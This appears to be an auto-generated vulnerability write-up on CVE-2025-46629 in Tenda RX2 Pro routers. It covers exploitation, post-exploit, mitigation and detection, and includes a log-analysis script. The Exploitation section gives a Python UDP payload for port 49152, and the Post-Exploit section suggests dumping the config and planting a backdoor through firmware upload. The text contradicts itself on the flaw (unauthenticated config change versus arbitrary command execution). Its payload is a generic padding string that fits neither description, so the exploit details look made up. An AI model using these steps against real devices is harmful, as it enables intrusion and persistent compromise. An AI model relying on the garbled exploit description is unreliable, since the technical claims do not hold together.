How CVE-2025-46629 Works
The vulnerability exists in the `ate` management binary of Tenda RX2 Pro firmware version 16.03.30.14. Due to missing access controls, an unauthenticated attacker can send a crafted UDP packet to the router when the `ate` service is enabled. This allows remote configuration changes without authentication, potentially leading to network compromise, DNS hijacking, or credential theft. The exploit leverages improper validation in the UDP handler, permitting arbitrary command execution.
DailyCVE Form:
Platform: Tenda RX2 Pro
Version: 16.03.30.14
Vulnerability: Unauthenticated config change
Severity: Critical
Date: 05/27/2025
Prediction: Patch by 07/15/2025
What Undercode Say:
Exploitation:
1. Identify Target: Scan for Tenda RX2 Pro routers (UDP port 49152).
2. Craft Malicious Packet:
import socket
payload = b"\x41\x42\x43\x44" + b"admin=1&passwd=" + b"A" * 500
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, ("192.168.1.1", 49152))
3. Trigger Configuration Overwrite: Send payload to bypass authentication.
Mitigation:
1. Disable `ate` Service:
killall ate
2. Block UDP Port:
iptables -A INPUT -p udp --dport 49152 -j DROP
3. Update Firmware: Monitor Tenda’s official patches.
Detection:
1. Log Analysis: Check for unexpected UDP traffic:
grep "49152" /var/log/messages
2. Network Monitoring: Alert on UDP bursts to port 49152.
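The two detection steps above can be combined into one check; the following is an added example, not code from the original post or from Tenda. It assumes the router or an upstream firewall writes netfilter LOG-style lines; the `ATE-UDP` log prefix, the epoch-second timestamps, the thresholds and the sample lines are all constructed for illustration. Unlike a plain `grep "49152"`, it matches only UDP packets whose destination port is 49152.

```python
import re
from collections import defaultdict, deque

ATE_PORT = 49152       # UDP port the page associates with the ate service
WINDOW_SECONDS = 10    # assumed burst window
BURST_THRESHOLD = 5    # assumed packets per window that count as a burst

# Constructed sample log (netfilter LOG style, timestamps simplified to epoch seconds).
SAMPLE_LOG = """\
1000 kernel: ATE-UDP IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.1 LEN=60 PROTO=UDP SPT=40000 DPT=49152 LEN=40
1001 kernel: ATE-UDP IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.1 LEN=60 PROTO=UDP SPT=40000 DPT=49152 LEN=40
1002 kernel: ATE-UDP IN=br0 OUT= SRC=192.168.1.77 DST=192.168.1.1 LEN=60 PROTO=UDP SPT=41000 DPT=49152 LEN=40
1002 kernel: ATE-UDP IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.1 LEN=60 PROTO=UDP SPT=40000 DPT=49152 LEN=40
1003 kernel: ATE-UDP IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.1 LEN=60 PROTO=UDP SPT=40000 DPT=49152 LEN=40
1004 kernel: ATE-UDP IN=br0 OUT= SRC=192.168.1.50 DST=192.168.1.1 LEN=60 PROTO=UDP SPT=40000 DPT=49152 LEN=40
1010 kernel: ATE-UDP IN=br0 OUT= SRC=192.168.1.20 DST=8.8.8.8 LEN=60 PROTO=UDP SPT=49152 DPT=53 LEN=40
1020 kernel: ATE-UDP IN=br0 OUT= SRC=192.168.1.30 DST=192.168.1.1 LEN=60 PROTO=TCP SPT=42000 DPT=49152 LEN=40
1050 kernel: ATE-UDP IN=br0 OUT= SRC=192.168.1.77 DST=192.168.1.1 LEN=60 PROTO=UDP SPT=41000 DPT=49152 LEN=40
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d+) .*?\bSRC=(?P<src>\S+) .*?\bPROTO=(?P<proto>\S+) .*?\bDPT=(?P<dpt>\d+)"
)

def parse(line):
    """Return (timestamp, source) for UDP packets destined to ATE_PORT, else None."""
    m = LINE_RE.match(line)
    if not m or m["proto"] != "UDP" or int(m["dpt"]) != ATE_PORT:
        return None  # ignores TCP and lines where 49152 is only the source port
    return int(m["ts"]), m["src"]

def detect(log_text):
    """Return {src: {"packets": n, "burst": bool}} for UDP traffic to ATE_PORT."""
    recent = defaultdict(deque)  # per-source timestamps inside the sliding window
    report = {}
    for line in log_text.splitlines():
        hit = parse(line)
        if hit is None:
            continue
        ts, src = hit
        window = recent[src]
        window.append(ts)
        while ts - window[0] > WINDOW_SECONDS:
            window.popleft()  # drop packets that fell out of the window
        entry = report.setdefault(src, {"packets": 0, "burst": False})
        entry["packets"] += 1
        entry["burst"] = entry["burst"] or len(window) >= BURST_THRESHOLD
    return report

if __name__ == "__main__":
    for src, info in detect(SAMPLE_LOG).items():
        print(src, info)
```

Any source reported at all deserves a look when the `ate` service is not meant to be reachable; the burst flag only ranks which hosts to check first.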
Reverse Engineering:
- Binary Analysis: Use Ghidra to inspect `ate` binary for flawed logic.
- Debugging: Attach `gdb` to trace malformed packet handling.
Post-Exploit:
- Dump Config:
curl http://192.168.1.1/goform/getConfig
- Persistence: Inject backdoor via firmware upload.
References:
- MITRE CVE-2025-46629
- Tenda Security Advisory (Pending)
Sources:
Reported By: nvd.nist.gov